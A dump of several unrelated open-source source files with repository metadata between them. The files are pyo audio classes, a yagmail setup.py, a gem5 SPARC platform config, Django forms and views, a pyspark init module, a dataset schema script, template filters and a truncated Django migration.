If `wxnoserver` is set to True, the interpreter will not wait for the
server GUI before showing the controller window.
"""
if xlen == None:
xlen = float(self._list[-1][0])
else:
xlen = float(xlen)
if yrange == None:
ymin = float(min([x[1] for x in self._list]))
ymax = float(max([x[1] for x in self._list]))
if ymin == ymax:
yrange = (0, ymax)
else:
yrange = (ymin, ymax)
createGraphWindow(self, 2, xlen, yrange, title, wxnoserver)
@property
def list(self):
"""float. List of points (time, value)."""
return self._list
@list.setter
def list(self, x): self.setList(x)
@property
def loop(self):
"""boolean. Looping mode."""
return self._loop
@loop.setter
def loop(self, x): self.setLoop(x)
@property
def exp(self):
"""float. Exponent factor."""
return self._exp
@exp.setter
def exp(self, x): self.setExp(x)
@property
def inverse(self):
"""boolean. Inverse downward slope."""
return self._inverse
@inverse.setter
def inverse(self, x): self.setInverse(x)
class SigTo(PyoObject):
"""
Convert numeric value to PyoObject signal with portamento.
When `value` is changed, a ramp is applied from the current
value to the new value. Can be used with PyoObject to apply
a linear portamento on an audio signal.
:Parent: :py:class:`PyoObject`
:Args:
value : float or PyoObject
Numerical value to convert.
time : float, optional
Ramp time, in seconds, to reach the new value. Defaults to 0.025.
init : float, optional
Initial value of the internal memory. Defaults to 0.
.. note::
The out() method is bypassed. SigTo's signal can not be sent to audio outs.
>>> import random
>>> s = Server().boot()
>>> s.start()
>>> fr = SigTo(value=200, time=0.5, init=200)
>>> a = SineLoop(freq=fr, feedback=0.08, mul=.3).out()
>>> b = SineLoop(freq=fr*1.005, feedback=0.08, mul=.3).out(1)
>>> def pick_new_freq():
... fr.value = random.randrange(200,501,50)
>>> pat = Pattern(function=pick_new_freq, time=1).play()
"""
def __init__(self, value, time=0.025, init=0.0, mul=1, add=0):
pyoArgsAssert(self, "OnnOO", value, time, init, mul, add)
PyoObject.__init__(self, mul, add)
self._value = value
self._time = time
value, time, init, mul ,add, lmax = convertArgsToLists(value, time, init, mul, add)
self._base_objs = [SigTo_base(wrap(value,i), wrap(time,i), wrap(init,i), wrap(mul,i), wrap(add,i)) for i in range(lmax)]
def setValue(self, x):
"""
Changes the value of the signal stream.
:Args:
x : float or PyoObject
Numerical value to convert.
"""
pyoArgsAssert(self, "O", x)
self._value = x
x, lmax = convertArgsToLists(x)
[obj.setValue(wrap(x,i)) for i, obj in enumerate(self._base_objs)]
def setTime(self, x):
"""
Changes the ramp time of the object.
:Args:
x : float
New ramp time.
"""
pyoArgsAssert(self, "n", x)
self._time = x
x, lmax = convertArgsToLists(x)
[obj.setTime(wrap(x,i)) for i, obj in enumerate(self._base_objs)]
def ctrl(self, map_list=None, title=None, wxnoserver=False):
self._map_list = [SLMap(0, 10, 'lin', 'time', self._time, dataOnly=True)]
PyoObject.ctrl(self, map_list, title, wxnoserver)
@property
def value(self):
"""float or PyoObject. Numerical value to convert."""
return self._value
@value.setter
def value(self, x): self.setValue(x)
@property
def time(self):
"""float. Ramp time."""
return self._time
@time.setter
def time(self, x): self.setTime(x) | gpl-3.0 | 6,833,759,281,752,422,000 | 30.358682 | 172 | 0.567802 | false |
kootenpv/yagmail | setup.py | 1 | 2037 | from setuptools import setup
from setuptools import find_packages
with open('README.rst') as f:
LONG_DESCRIPTION = f.read()
MAJOR_VERSION = '0'
MINOR_VERSION = '14'
MICRO_VERSION = '247'
VERSION = "{}.{}.{}".format(MAJOR_VERSION, MINOR_VERSION, MICRO_VERSION)
setup(
name='yagmail',
version=VERSION,
description='Yet Another GMAIL client',
long_description=LONG_DESCRIPTION,
url='https://github.com/kootenpv/yagmail',
author='Pascal van Kooten',
author_email='kootenpv@gmail.com',
license='MIT',
extras_require={"all": ["keyring"]},
install_requires=["premailer"],
keywords='email mime automatic html attachment',
entry_points={'console_scripts': ['yagmail = yagmail.__main__:main']},
classifiers=[
'Environment :: Console',
'Intended Audience :: Developers',
'Intended Audience :: Customer Service',
'Intended Audience :: System Administrators',
'License :: OSI Approved :: MIT License',
'Operating System :: Microsoft',
'Operating System :: MacOS :: MacOS X',
'Operating System :: Unix',
'Operating System :: POSIX',
'Programming Language :: Python',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Topic :: Communications :: Email',
'Topic :: Communications :: Email :: Email Clients (MUA)',
'Topic :: Software Development',
'Topic :: Software Development :: Build Tools',
'Topic :: Software Development :: Debuggers',
'Topic :: Software Development :: Libraries',
'Topic :: Software Development :: Libraries :: Python Modules',
'Topic :: System :: Software Distribution',
'Topic :: System :: Systems Administration',
'Topic :: Utilities',
],
packages=find_packages(),
zip_safe=False,
platforms='any',
)
| mit | -5,868,926,427,037,378,000 | 36.722222 | 74 | 0.616593 | false |
jtyuan/racetrack | src/dev/sparc/T1000.py | 66 | 5810 | # Copyright (c) 2006-2007 The Regents of The University of Michigan
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Authors: Gabe Black
from m5.params import *
from m5.proxy import *
from Device import BasicPioDevice, PioDevice, IsaFake, BadAddr
from Platform import Platform
from Terminal import Terminal
from Uart import Uart8250
class MmDisk(BasicPioDevice):
type = 'MmDisk'
cxx_header = "dev/sparc/mm_disk.hh"
image = Param.DiskImage("Disk Image")
pio_addr = 0x1F40000000
class DumbTOD(BasicPioDevice):
type = 'DumbTOD'
cxx_header = "dev/sparc/dtod.hh"
time = Param.Time('01/01/2009', "System time to use ('Now' for real time)")
pio_addr = 0xfff0c1fff8
class Iob(PioDevice):
type = 'Iob'
cxx_header = "dev/sparc/iob.hh"
platform = Param.Platform(Parent.any, "Platform this device is part of.")
pio_latency = Param.Latency('1ns', "Programed IO latency")
class T1000(Platform):
type = 'T1000'
cxx_header = "dev/sparc/t1000.hh"
system = Param.System(Parent.any, "system")
fake_clk = IsaFake(pio_addr=0x9600000000, pio_size=0x100000000)
#warn_access="Accessing Clock Unit -- Unimplemented!")
fake_membnks = IsaFake(pio_addr=0x9700000000, pio_size=16384,
ret_data64=0x0000000000000000, update_data=False)
#warn_access="Accessing Memory Banks -- Unimplemented!")
fake_jbi = IsaFake(pio_addr=0x8000000000, pio_size=0x100000000)
#warn_access="Accessing JBI -- Unimplemented!")
fake_l2_1 = IsaFake(pio_addr=0xA900000000, pio_size=0x8,
ret_data64=0x0000000000000001, update_data=True)
#warn_access="Accessing L2 Cache Banks -- Unimplemented!")
fake_l2_2 = IsaFake(pio_addr=0xA900000040, pio_size=0x8,
ret_data64=0x0000000000000001, update_data=True)
#warn_access="Accessing L2 Cache Banks -- Unimplemented!")
fake_l2_3 = IsaFake(pio_addr=0xA900000080, pio_size=0x8,
ret_data64=0x0000000000000001, update_data=True)
#warn_access="Accessing L2 Cache Banks -- Unimplemented!")
fake_l2_4 = IsaFake(pio_addr=0xA9000000C0, pio_size=0x8,
ret_data64=0x0000000000000001, update_data=True)
#warn_access="Accessing L2 Cache Banks -- Unimplemented!")
fake_l2esr_1 = IsaFake(pio_addr=0xAB00000000, pio_size=0x8,
ret_data64=0x0000000000000000, update_data=True)
#warn_access="Accessing L2 ESR Cache Banks -- Unimplemented!")
fake_l2esr_2 = IsaFake(pio_addr=0xAB00000040, pio_size=0x8,
ret_data64=0x0000000000000000, update_data=True)
#warn_access="Accessing L2 ESR Cache Banks -- Unimplemented!")
fake_l2esr_3 = IsaFake(pio_addr=0xAB00000080, pio_size=0x8,
ret_data64=0x0000000000000000, update_data=True)
#warn_access="Accessing L2 ESR Cache Banks -- Unimplemented!")
fake_l2esr_4 = IsaFake(pio_addr=0xAB000000C0, pio_size=0x8,
ret_data64=0x0000000000000000, update_data=True)
#warn_access="Accessing L2 ESR Cache Banks -- Unimplemented!")
fake_ssi = IsaFake(pio_addr=0xff00000000, pio_size=0x10000000)
#warn_access="Accessing SSI -- Unimplemented!")
hterm = Terminal()
hvuart = Uart8250(pio_addr=0xfff0c2c000)
htod = DumbTOD()
pterm = Terminal()
puart0 = Uart8250(pio_addr=0x1f10000000)
iob = Iob()
# Attach I/O devices that are on chip
def attachOnChipIO(self, bus):
self.iob.pio = bus.master
self.htod.pio = bus.master
# Attach I/O devices to specified bus object. Can't do this
# earlier, since the bus object itself is typically defined at the
# System level.
def attachIO(self, bus):
self.hvuart.terminal = self.hterm
self.puart0.terminal = self.pterm
self.fake_clk.pio = bus.master
self.fake_membnks.pio = bus.master
self.fake_l2_1.pio = bus.master
self.fake_l2_2.pio = bus.master
self.fake_l2_3.pio = bus.master
self.fake_l2_4.pio = bus.master
self.fake_l2esr_1.pio = bus.master
self.fake_l2esr_2.pio = bus.master
self.fake_l2esr_3.pio = bus.master
self.fake_l2esr_4.pio = bus.master
self.fake_ssi.pio = bus.master
self.fake_jbi.pio = bus.master
self.puart0.pio = bus.master
self.hvuart.pio = bus.master
| bsd-3-clause | 7,878,468,195,683,676,000 | 40.798561 | 79 | 0.695525 | false |
NadaBayoumy/DjangoPythonBlog | Blog/BlogApp/forms.py | 1 | 2667 | #nada
from django import forms
from .models import Category
from .models import ForbiddenWords
from .models import Post
from django import forms
#end nada
#alem
from .models import Post, Reply
#end alem
#hossam
from django import forms
from django.contrib.auth.forms import UserCreationForm
from django.contrib.auth.models import User
#end hossam
#simona
from django.forms.widgets import Widget
from django.contrib.auth.forms import UserCreationForm
#end simona
#nada
class CategoryForm(forms.ModelForm):
class Meta:
model=Category
fields=('categoryName',)
class ForbiddenWordsForm(forms.ModelForm):
class Meta:
model=ForbiddenWords
fields=('forbiddenWord',)
class PostForm(forms.ModelForm):
class Meta:
model=Post
fields=('postTitle','postPic','postContent','userID','postCategory')
#endnada
#alem
class Post_Form(forms.ModelForm):
class Meta:
model = Post
fields = ('postTitle', 'postPic', 'postContent')#'userID', 'postCategory')
class Comment_Form(forms.ModelForm):
class Meta:
model = Reply
fields = ('replyContent',)
#end alem
#hossam
class CreateUserForm(UserCreationForm):
class Meta:
model = User
fields = ('username', 'first_name', 'last_name', 'email', 'password1', 'password2', 'is_staff', 'is_active', 'is_superuser')
class EditUserForm(forms.ModelForm):
class Meta:
model = User
fields = ('username', 'first_name', 'last_name', 'email', 'is_staff', 'is_active', 'is_superuser')
class ChangePwForm(UserCreationForm):
username = forms.CharField(widget=forms.TextInput(attrs={'readonly': 'readonly'}), help_text="This is a disabled field.")
class Meta:
model = User
fields = ('username', 'password1', 'password2')
#end hossam
#simona
class RegistrationForm(UserCreationForm):
class Meta:
model =User
fields=['username','email','first_name','last_name','password1', 'password2']
def clean_email(self):
clean_data = super(RegistrationForm, self).clean()
email=clean_data.get('email')
if User.objects.filter(email=email).count() > 0:
raise forms.ValidationError("this email is already in use")
print("clean_email")
return email
def clean_username(self):
clean_data = super(RegistrationForm, self).clean()
name=clean_data.get('username')
return name
#end simona
| gpl-2.0 | -7,744,843,897,878,007,000 | 20.336 | 132 | 0.620172 | false |
bravo-zhang/spark | python/pyspark/mllib/__init__.py | 123 | 1412 | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
RDD-based machine learning APIs for Python (in maintenance mode).
The `pyspark.mllib` package is in maintenance mode as of the Spark 2.0.0 release to encourage
migration to the DataFrame-based APIs under the `pyspark.ml` package.
"""
from __future__ import absolute_import
# MLlib currently needs NumPy 1.4+, so complain if lower
import numpy
ver = [int(x) for x in numpy.version.version.split('.')[:2]]
if ver < [1, 4]:
raise Exception("MLlib requires NumPy 1.4+")
__all__ = ['classification', 'clustering', 'feature', 'fpm', 'linalg', 'random',
'recommendation', 'regression', 'stat', 'tree', 'util']
| apache-2.0 | -8,250,000,166,014,086,000 | 39.342857 | 93 | 0.735127 | false |
RetailMeNotSandbox/dart | src/python/dart/client/python/examples/datasets/owen_outclick_us_v02.py | 1 | 14227 | from dart.client.python.dart_client import Dart
from dart.model.dataset import Column, DatasetData, Dataset, DataFormat, FileFormat, RowFormat, DataType, Compression, \
LoadType
if __name__ == '__main__':
dart = Dart('localhost', 5000)
assert isinstance(dart, Dart)
dataset = dart.save_dataset(Dataset(data=(DatasetData(
name='owen_outclick_us_v02',
description='Owen outclick data, based on overlord schema version. Considered a replacement for outclick events.',
table_name='outclick',
location='s3://example-bucket/prd/inbound/overlord/raw-firehose-02/rmn-outclicks',
load_type=LoadType.MERGE,
data_format=DataFormat(
file_format=FileFormat.TEXTFILE,
row_format=RowFormat.JSON,
),
compression=Compression.GZIP,
partitions=[
Column('year', DataType.STRING),
Column('month', DataType.STRING),
Column('day', DataType.STRING),
],
primary_keys=['eventInstanceUuid'],
merge_keys=['eventInstanceUuid'],
sort_keys=['eventTimestamp', 'eventInstanceUuid', 'derivedEventInstanceId'],
distribution_keys=['eventInstanceUuid'],
batch_merge_sort_keys=['owenProcessed DESC'],
columns=[
Column('advertiserUuid', DataType.VARCHAR, length=2048, path='owen.context.advertiserUuid'),
Column('appBadgeCount', DataType.INT, path='owen.context.appBadgeCount'),
Column('appForegroundFlag', DataType.BOOLEAN, path='owen.context.appForegroundFlag'),
Column('bluetoothBeaconId', DataType.VARCHAR, length=50, path='owen.context.bluetoothBeaconId'),
Column('bluetoothBeaconType', DataType.VARCHAR, length=25, path='owen.context.bluetoothBeaconType'),
Column('bluetoothEnabledFlag', DataType.BOOLEAN, path='owen.context.bluetoothEnabledFlag'),
Column('breadCrumb', DataType.VARCHAR, length=2048, path='owen.context.breadCrumb'),
Column('browserFamily', DataType.VARCHAR, length=50, path='owen.context.browserFamily'),
Column('browserVersion', DataType.VARCHAR, length=50, path='owen.context.browserVersion'),
Column('carrier', DataType.VARCHAR, length=25, path='owen.context.carrier'),
Column('city', DataType.VARCHAR, length=75, path='owen.context.city'),
Column('connectionType', DataType.VARCHAR, length=25, path='owen.context.connectionType'),
Column('country', DataType.VARCHAR, length=2, path='owen.context.country'),
Column('custom', DataType.VARCHAR, path='owen.context.custom'),
Column('deviceCategory', DataType.VARCHAR, length=2048, path='owen.context.deviceCategory'),
Column('deviceFingerprint', DataType.VARCHAR, length=26, path='owen.context.deviceFingerprint'),
Column('dma', DataType.INT, path='owen.context.dma'),
Column('environment', DataType.VARCHAR, length=2048, path='owen.context.environment'),
Column('experimentObject', DataType.VARCHAR, length=1024, path='owen.context.experiment'),
Column('failureFlag', DataType.BOOLEAN, path='owen.context.failureFlag'),
Column('failureReason', DataType.VARCHAR, length=2048, path='owen.context.failureReason'),
Column('favoriteFlag', DataType.BOOLEAN, path='owen.context.favoriteFlag'),
Column('featureFlags', DataType.VARCHAR, path='owen.context.featureFlags'),
Column('geofenceUuid', DataType.VARCHAR, length=2048, path='owen.context.geofenceUuid'),
Column('inventoryCount', DataType.INT, path='owen.context.inventoryCount'),
Column('inventory_affiliateNetwork', DataType.VARCHAR, length=50, path='owen.context.inventory[0].affiliateNetwork'),
Column('inventory_brand', DataType.VARCHAR, length=100, path='owen.context.inventory[0].brand'),
Column('inventory_claimUuid', DataType.VARCHAR, length=2048, path='owen.context.inventory[0].claimUuid'),
Column('inventory_clickLocation', DataType.VARCHAR, length=100, path='owen.context.inventory[0].clickLocation'),
Column('inventory_commentsCount', DataType.INT, path='owen.context.inventory[0].commentsCount'),
Column('inventory_conquestingFlag', DataType.BOOLEAN, path='owen.context.inventory[0].conquestingFlag'),
Column('inventory_couponRank', DataType.NUMERIC, precision=18, scale=4, path='owen.context.inventory[0].couponRank'),
Column('inventory_deepLinkUrl', DataType.VARCHAR, length=2048, path='owen.context.inventory[0].deepLinkUrl'),
Column('inventory_deepLinkUrlScheme', DataType.VARCHAR, length=2048, path='owen.context.inventory[0].deepLinkUrlScheme'),
Column('inventory_exclusivityFlag', DataType.BOOLEAN, path='owen.context.inventory[0].exclusivityFlag'),
Column('inventory_expirationDate', DataType.VARCHAR, length=2048, path='owen.context.inventory[0].expirationDate'),
Column('inventory_finalPrice', DataType.NUMERIC, precision=18, scale=4, path='owen.context.inventory[0].finalPrice'),
Column('inventory_instoreType', DataType.VARCHAR, length=2048, path='owen.context.inventory[0].instoreType'),
Column('inventory_inventoryChannel', DataType.VARCHAR, length=2048, path='owen.context.inventory[0].inventoryChannel'),
Column('inventory_inventoryName', DataType.VARCHAR, length=2048, path='owen.context.inventory[0].inventoryName'),
Column('inventory_inventorySource', DataType.VARCHAR, length=50, path='owen.context.inventory[0].inventorySource'),
Column('inventory_inventoryType', DataType.VARCHAR, length=25, path='owen.context.inventory[0].inventoryType'),
Column('inventory_inventoryUuid', DataType.VARCHAR, length=2048, path='owen.context.inventory[0].inventoryUuid'),
Column('inventory_lastVerifiedDate', DataType.VARCHAR, length=2048, path='owen.context.inventory[0].lastVerifiedDate'),
Column('inventory_monetizableFlag', DataType.BOOLEAN, path='owen.context.inventory[0].monetizableFlag'),
Column('inventory_noVotes', DataType.INT, path='owen.context.inventory[0].noVotes'),
Column('inventory_onlineType', DataType.VARCHAR, length=2048, path='owen.context.inventory[0].onlineType'),
Column('inventory_originalPrice', DataType.NUMERIC, precision=18, scale=4, path='owen.context.inventory[0].originalPrice'),
Column('inventory_outRedirectUrl', DataType.VARCHAR, length=2048, path='owen.context.inventory[0].outRedirectUrl'),
Column('inventory_outclickUuid', DataType.VARCHAR, length=2048, path='owen.context.inventory[0].outclickUuid'),
Column('inventory_parentInventoryUuid', DataType.VARCHAR, length=2048, path='owen.context.inventory[0].parentInventoryUuid'),
Column('inventory_personalizationFlag', DataType.BOOLEAN, path='owen.context.inventory[0].personalizationFlag'),
Column('inventory_position', DataType.INT, path='owen.context.inventory[0].position'),
Column('inventory_proximity', DataType.NUMERIC, precision=18, scale=4, path='owen.context.inventory[0].proximity'),
Column('inventory_proximityUnit', DataType.VARCHAR, length=2048, path='owen.context.inventory[0].proximityUnit'),
Column('inventory_recommendedFlag', DataType.BOOLEAN, path='owen.context.inventory[0].recommendedFlag'),
Column('inventory_redemptionChannel', DataType.VARCHAR, length=2048, path='owen.context.inventory[0].redemptionChannel'),
Column('inventory_retailCategory', DataType.VARCHAR, length=75, path='owen.context.inventory[0].retailCategory'),
Column('inventory_savedFlag', DataType.BOOLEAN, path='owen.context.inventory[0].savedFlag'),
Column('inventory_siteUuid', DataType.VARCHAR, length=26, path='owen.context.inventory[0].siteUuid'),
Column('inventory_startDate', DataType.VARCHAR, length=2048, path='owen.context.inventory[0].startDate'),
Column('inventory_successPercentage', DataType.NUMERIC, precision=18, scale=4, path='owen.context.inventory[0].successPercentage'),
Column('inventory_usedByCount', DataType.INT, path='owen.context.inventory[0].usedByCount'),
Column('inventory_yesVotes', DataType.INT, path='owen.context.inventory[0].yesVotes'),
Column('ipAddress', DataType.VARCHAR, length=45, path='owen.context.ipAddress'),
Column('language', DataType.VARCHAR, length=6, path='owen.context.language'),
Column('latitude', DataType.NUMERIC, precision=18, scale=4, path='owen.context.latitude'),
Column('locationEnabledFlag', DataType.BOOLEAN, path='owen.context.locationEnabledFlag'),
Column('loggedInFlag', DataType.BOOLEAN, path='owen.context.loggedInFlag'),
Column('longitude', DataType.NUMERIC, precision=18, scale=4, path='owen.context.longitude'),
Column('macAddress', DataType.VARCHAR, length=2048, path='owen.context.macAddress'),
Column('marketing_adGroup', DataType.VARCHAR, length=2048, path='owen.context.marketing.adGroup'),
Column('marketing_campaign', DataType.VARCHAR, length=50, path='owen.context.marketing.campaign'),
Column('marketing_campaignSendCount', DataType.INT, path='owen.context.marketing.campaignSendCount'),
Column('marketing_campaignUuid', DataType.VARCHAR, length=2048, path='owen.context.marketing.campaignUuid'),
Column('marketing_cdRank', DataType.INT, path='owen.context.marketing.cdRank'),
Column('marketing_channel', DataType.VARCHAR, length=50, path='owen.context.marketing.channel'),
Column('marketing_content', DataType.VARCHAR, length=2048, path='owen.context.marketing.content'),
Column('marketing_medium', DataType.VARCHAR, length=50, path='owen.context.marketing.medium'),
Column('marketing_notificationUuid', DataType.VARCHAR, length=2048, path='owen.context.marketing.notificationUuid'),
Column('marketing_source', DataType.VARCHAR, length=100, path='owen.context.marketing.source'),
Column('marketing_term', DataType.VARCHAR, length=2048, path='owen.context.marketing.term'),
Column('marketing_vendor', DataType.VARCHAR, length=25, path='owen.context.marketing.vendor'),
Column('mobileDeviceMake', DataType.VARCHAR, length=25, path='owen.context.mobileDeviceMake'),
Column('mobileDeviceModel', DataType.VARCHAR, length=50, path='owen.context.mobileDeviceModel'),
Column('notificationEnabledFlag', DataType.BOOLEAN, path='owen.context.notificationEnabledFlag'),
Column('osFamily', DataType.VARCHAR, length=25, path='owen.context.osFamily'),
Column('osName', DataType.VARCHAR, length=2048, path='owen.context.osName'),
Column('osVersion', DataType.VARCHAR, length=2048, path='owen.context.osVersion'),
Column('pageName', DataType.VARCHAR, length=2048, path='owen.context.pageName'),
Column('pageType', DataType.VARCHAR, length=100, path='owen.context.pageType'),
Column('partialSearchTerm', DataType.VARCHAR, length=2048, path='owen.context.partialSearchTerm'),
Column('personalizationFlag', DataType.BOOLEAN, path='owen.context.personalizationFlag'),
Column('previousPageName', DataType.VARCHAR, length=2048, path='owen.context.previousPageName'),
Column('previousViewInstanceUuid', DataType.VARCHAR, length=2048, path='owen.context.previousViewInstanceUuid'),
Column('promptName', DataType.VARCHAR, length=2048, path='owen.context.promptName'),
Column('propertyName', DataType.VARCHAR, length=20, path='owen.context.propertyName'),
Column('referrer', DataType.VARCHAR, length=2048, path='owen.context.referrer'),
Column('region', DataType.VARCHAR, length=25, path='owen.context.region'),
Column('screenHeight', DataType.INT, path='owen.context.screenHeight'),
Column('screenWidth', DataType.INT, path='owen.context.screenWidth'),
Column('session', DataType.VARCHAR, length=2048, path='owen.context.session'),
Column('test_testUuid', DataType.VARCHAR, length=26, path='owen.context.test.testUuid'),
Column('udid', DataType.VARCHAR, length=40, path='owen.context.udid'),
Column('userAgent', DataType.VARCHAR, length=2048, path='owen.context.userAgent'),
Column('userQualifier', DataType.VARCHAR, length=26, path='owen.context.userQualifier'),
Column('userUuid', DataType.VARCHAR, length=2048, path='owen.context.userUuid'),
Column('vendorObject', DataType.VARCHAR, length=512, path='owen.context.vendor'),
Column('viewInstanceUuid', DataType.VARCHAR, length=128, path='owen.context.viewInstanceUuid'),
Column('eventAction', DataType.VARCHAR, length=2048, path='owen.event.eventAction'),
Column('eventCategory', DataType.VARCHAR, length=25, path='owen.event.eventCategory'),
Column('eventInstanceUuid', DataType.VARCHAR, length=26, path='owen.event.eventInstanceUuid'),
Column('eventName', DataType.VARCHAR, length=50, path='owen.event.eventName'),
Column('eventPlatform', DataType.VARCHAR, length=25, path='owen.event.eventPlatform'),
Column('eventPlatformVersion', DataType.VARCHAR, length=25, path='owen.event.eventPlatformVersion'),
Column('eventTarget', DataType.VARCHAR, length=2048, path='owen.event.eventTarget'),
Column('eventVersion', DataType.VARCHAR, length=25, path='owen.event.eventVersion'),
Column('eventTimestamp', DataType.DATETIME, date_pattern="yyyy-MM-dd'T'HH:mm:ss'Z'", path='owen.event.eventTimestamp'),
Column('derivedEventInstanceId', DataType.VARCHAR, length=64, path='metadata.derivedEventInstanceId'),
Column('owenProcessed', DataType.DATETIME, date_pattern="yyyy-MM-dd'T'HH:mm:ss'Z'", path='metadata.analyticsTopologyFinishTime'),
],
))))
print 'created dataset: %s' % dataset.id
| mit | 5,392,234,368,456,697,000 | 91.986928 | 143 | 0.694806 | false |
AthinaB/synnefo | snf-cyclades-app/synnefo/api/flavors.py | 9 | 3419 | # Copyright (C) 2010-2014 GRNET S.A.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from logging import getLogger
from django.conf.urls import patterns
from django.http import HttpResponse
from django.template.loader import render_to_string
from django.utils import simplejson as json
from snf_django.lib import api
from synnefo.api import util
from synnefo.db.models import Flavor
log = getLogger('synnefo.api')
urlpatterns = patterns(
'synnefo.api.flavors',
(r'^(?:/|.json|.xml)?$', 'list_flavors'),
(r'^/detail(?:.json|.xml)?$', 'list_flavors', {'detail': True}),
(r'^/(\d+)(?:.json|.xml)?$', 'get_flavor_details'),
)
def flavor_to_dict(flavor, detail=True):
d = {'id': flavor.id, 'name': flavor.name}
d['links'] = util.flavor_to_links(flavor.id)
if detail:
d['ram'] = flavor.ram
d['disk'] = flavor.disk
d['vcpus'] = flavor.cpu
d['SNF:disk_template'] = flavor.volume_type.disk_template
d['SNF:volume_type'] = flavor.volume_type_id
d['SNF:allow_create'] = flavor.allow_create
return d
@api.api_method(http_method='GET', user_required=True, logger=log)
def list_flavors(request, detail=False):
# Normal Response Codes: 200, 203
# Error Response Codes: computeFault (400, 500),
# serviceUnavailable (503),
# unauthorized (401),
# badRequest (400),
# overLimit (413)
log.debug('list_flavors detail=%s', detail)
active_flavors = Flavor.objects.select_related("volume_type")\
.exclude(deleted=True)
flavors = [flavor_to_dict(flavor, detail)
for flavor in active_flavors.order_by('id')]
if request.serialization == 'xml':
data = render_to_string('list_flavors.xml', {
'flavors': flavors,
'detail': detail})
else:
data = json.dumps({'flavors': flavors})
return HttpResponse(data, status=200)
@api.api_method(http_method='GET', user_required=True, logger=log)
def get_flavor_details(request, flavor_id):
# Normal Response Codes: 200, 203
# Error Response Codes: computeFault (400, 500),
# serviceUnavailable (503),
# unauthorized (401),
# badRequest (400),
# itemNotFound (404),
# overLimit (413)
log.debug('get_flavor_details %s', flavor_id)
flavor = util.get_flavor(flavor_id, include_deleted=True)
flavordict = flavor_to_dict(flavor, detail=True)
if request.serialization == 'xml':
data = render_to_string('flavor.xml', {'flavor': flavordict})
else:
data = json.dumps({'flavor': flavordict})
return HttpResponse(data, status=200)
| gpl-3.0 | 8,546,614,988,723,968,000 | 34.614583 | 71 | 0.623867 | false |
Doteveryone/BetterJobAdverts | jobcert/filters.py | 1 | 1556 | from jobcert import app
@app.template_filter('readability_words')
def readability_words_filter(s):
score = int(s)
if score in range(90, 100):
return "Very Easy"
elif score in range(80, 89):
return "Easy"
elif score in range(70, 79):
return "Fairly Easy"
elif score in range (60, 69):
return "Standard"
elif score in range (50, 59):
return "Fairly Difficult"
elif score in range (30, 49):
return "Difficult"
else:
return "Very Confusing"
@app.template_filter('trafficlight_status')
def trafficlight_status_filter(s):
if s == 'clear':
return "success"
if s == 'unclear':
return "warning"
else:
return "alert"
@app.template_filter('boolean_status')
def boolean_status_filter(s):
if bool(s):
return "success"
else:
return "alert"
@app.template_filter('format_status')
def format_status_filter(s):
if s == 'yes':
return "success"
if s == 'incomplete':
return "warning"
else:
return "alert"
@app.template_filter('readability_status')
def readability_status_filter(s):
score = int(s)
if score in range(60, 100):
return "success"
elif score in range (30, 59):
return "warning"
else:
return "alert"
@app.template_filter('gender_coded_status')
def gender_coded_status_filter(s):
if s in ('feminine-coded', 'strongly feminine-coded', 'neutral'):
return "success"
else:
return "warning" | agpl-3.0 | 6,541,564,765,748,464,000 | 24.52459 | 69 | 0.596401 | false |
gwu-libraries/sfm-ui | sfm/ui/migrations/0021_auto_20180712_1310.py | 2 | 10258 | # Generated by Django 2.0.7 on 2018-07-12 17:10
import django.contrib.auth.validators
from django.db import migrations, models
import jsonfield.fields
class Migration(migrations.Migration):
dependencies = [
('ui', '0020_auto_20180608_1144'),
]
operations = [
migrations.AddField(
model_name='historicalcollection',
name='history_change_reason',
field=models.CharField(max_length=100, null=True),
),
migrations.AddField(
model_name='historicalcollectionset',
name='history_change_reason',
field=models.CharField(max_length=100, null=True),
),
migrations.AddField(
model_name='historicalcredential',
name='history_change_reason',
field=models.CharField(max_length=100, null=True),
),
migrations.AddField(
model_name='historicalseed',
name='history_change_reason',
field=models.CharField(max_length=100, null=True),
),
migrations.AlterField(
model_name='collection',
name='end_date',
